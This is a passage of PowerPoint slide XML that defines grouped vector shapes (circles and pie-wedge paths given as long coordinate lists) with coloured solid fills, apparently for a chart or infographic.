                    <a:pt x="973286" y="55513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929636" y="38769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884432" y="24829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837755" y="13815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790456" y="5968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743385" y="1390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696664" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF886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7691" y="3229356"/>
              <a:ext cx="880871" cy="879348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9029287" y="2802305"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="9029287" y="2802305"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9029287" y="2802305"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704340" h="1721485">
                  <a:moveTo>
                    <a:pt x="838430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791496" y="2448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745078" y="7432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699262" y="14897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654134" y="24784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609778" y="37037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566281" y="51599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523728" y="68413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482204" y="87422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441795" y="108569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402587" y="131797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364664" y="157049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328114" y="184268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293020" y="213398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259468" y="244380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227545" y="277159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197335" y="311677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168925" y="347877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142399" y="385703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117843" y="425097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95342" y="466003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74983" y="508363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56850" y="552121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41030" y="597220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27607" y="643602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16668" y="691210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8412" y="739355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920" y="787325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="835035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2457" y="929334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7450" y="975752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14923" y="1021568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24817" y="1066696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37077" y="1111052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51645" y="1154549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68464" y="1197102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87478" y="1238626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108629" y="1279035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131861" y="1318243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157116" y="1356165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184338" y="1392716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213470" y="1427810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244454" y="1461361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277235" y="1493285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311754" y="1523494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347956" y="1551905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385783" y="1578431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425178" y="1602987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466084" y="1625488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508444" y="1645847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552202" y="1663979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597301" y="1679800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643683" y="1693223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691292" y="1704162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739436" y="1712431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787406" y="1717934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835116" y="1720730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882481" y="1720876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929415" y="1718428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975833" y="1713443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021649" y="1705979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066778" y="1696091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111133" y="1683838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154630" y="1669276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197184" y="1652462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238707" y="1633453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279116" y="1612306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318324" y="1589078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356247" y="1563826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392798" y="1536607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427892" y="1507478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461443" y="1476495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493366" y="1443717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523576" y="1409199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551986" y="1372998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578513" y="1335172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603069" y="1295778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625569" y="1254872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645928" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664061" y="1168754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679881" y="1123656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693304" y="1077274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704244" y="1029665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860456" y="860374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029620" y="16713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981475" y="8445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933505" y="2941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885795" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838430" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="57AE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189619" y="2962810"/>
              <a:ext cx="1400175" cy="1400175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1400175" h="1400175">
                  <a:moveTo>
                    <a:pt x="696665" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="650409" y="1715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604751" y="6454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559812" y="14135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515717" y="24677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472586" y="37997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430544" y="54015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389712" y="72647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350213" y="93814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312170" y="117432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275705" y="143420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240941" y="171696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208000" y="202179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177006" y="234786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148080" y="269437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121345" y="306048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96924" y="344540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74939" y="384829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55513" y="426834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38769" y="470474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24829" y="515666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13815" y="562328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5968" y="609627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1390" y="656698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="703419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715" y="749667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6454" y="795320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14135" y="840254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24677" y="884347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37997" y="927477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54015" y="969520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72647" y="1010354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93814" y="1049855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117432" y="1087902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143420" y="1124371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171696" y="1159140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202179" y="1192086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234786" y="1223086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269437" y="1252017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306048" y="1278757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344540" y="1303183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384829" y="1325172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426834" y="1344602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470474" y="1361349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515666" y="1375290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562328" y="1386304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609641" y="1394152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656724" y="1398730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703455" y="1400120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749711" y="1398405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795369" y="1393666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840308" y="1385985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884403" y="1375443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927533" y="1362123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969576" y="1346105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010408" y="1327473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049907" y="1306306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087950" y="1282688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124415" y="1256700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159179" y="1228424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192119" y="1197941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223114" y="1165334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252040" y="1130683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278775" y="1094072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303196" y="1055580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325181" y="1015291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344607" y="973286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361351" y="929646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375291" y="884454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386304" y="837791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394152" y="790479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398730" y="743395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400120" y="696665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398405" y="650409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393666" y="604751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1385985" y="559812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375443" y="515717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362123" y="472586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346105" y="430544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327473" y="389712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306306" y="350213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282688" y="312170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256700" y="275705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1228424" y="240941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197941" y="208000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165334" y="177006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130683" y="148080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094072" y="121345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055580" y="96924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015291" y="74939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973286" y="55513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929646" y="38769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884454" y="24829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837791" y="13815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790479" y="5968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743395" y="1390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696665" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0184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13747" y="3240024"/>
              <a:ext cx="952500" cy="952500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2565303" y="2802305"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="12565303" y="2802305"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12565303" y="2802305"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704340" h="1721485">
                  <a:moveTo>
                    <a:pt x="838475" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791541" y="2448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745124" y="7432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699308" y="14897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654179" y="24784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609824" y="37037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566327" y="51599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523773" y="68413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482250" y="87422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441841" y="108569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402632" y="131797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364710" y="157049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328159" y="184268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293065" y="213398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259514" y="244380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227591" y="277159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197381" y="311677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168970" y="347877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142444" y="385703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117888" y="425097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95388" y="466003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75029" y="508363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56896" y="552121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41076" y="597220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27653" y="643602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16713" y="691210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8445" y="739355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941" y="787325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="835035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2448" y="929334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7432" y="975752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14897" y="1021568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24784" y="1066696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37037" y="1111052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51599" y="1154549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68413" y="1197102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87422" y="1238626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108569" y="1279035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131797" y="1318243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157049" y="1356165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184268" y="1392716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213398" y="1427810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244380" y="1461361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277159" y="1493285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311677" y="1523494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347877" y="1551905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385703" y="1578431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425097" y="1602987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466003" y="1625488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508363" y="1645847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552121" y="1663979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597220" y="1679800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643602" y="1693223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691210" y="1704162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739367" y="1712431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787349" y="1717934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835070" y="1720730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882445" y="1720876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929388" y="1718428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975814" y="1713443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021637" y="1705979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066772" y="1696091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111133" y="1683838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154635" y="1669276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197192" y="1652462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238718" y="1633453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279129" y="1612306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318338" y="1589078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356261" y="1563826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392811" y="1536607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427903" y="1507478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461451" y="1476495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493371" y="1443717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523576" y="1409199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551981" y="1372998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578501" y="1335172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603050" y="1295778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625542" y="1254872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645892" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664015" y="1168754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679824" y="1123656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693235" y="1077274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704162" y="1029665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860501" y="860374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029665" y="16713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981521" y="8445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933551" y="2941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885840" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838475" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E691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2725681" y="2962810"/>
              <a:ext cx="1400175" cy="1400175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1400175" h="1400175">
                  <a:moveTo>
                    <a:pt x="696574" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="650327" y="1715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604674" y="6454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559741" y="14135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515649" y="24677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472521" y="37997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430480" y="54015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389648" y="72647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350150" y="93814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312107" y="117432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275642" y="143420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240878" y="171696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207938" y="202179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176945" y="234786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148021" y="269437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121289" y="306048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96873" y="344540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74894" y="384829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55476" y="426834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38742" y="470474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24814" y="515666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13815" y="562328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5968" y="609627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1390" y="656698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="703419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715" y="749667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6454" y="795320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14135" y="840254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24677" y="884347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37997" y="927477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54015" y="969520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72647" y="1010354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93814" y="1049855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117432" y="1087902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143420" y="1124371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171696" y="1159140"/>
                  </a:lnTo>
                  <a:lnTo>
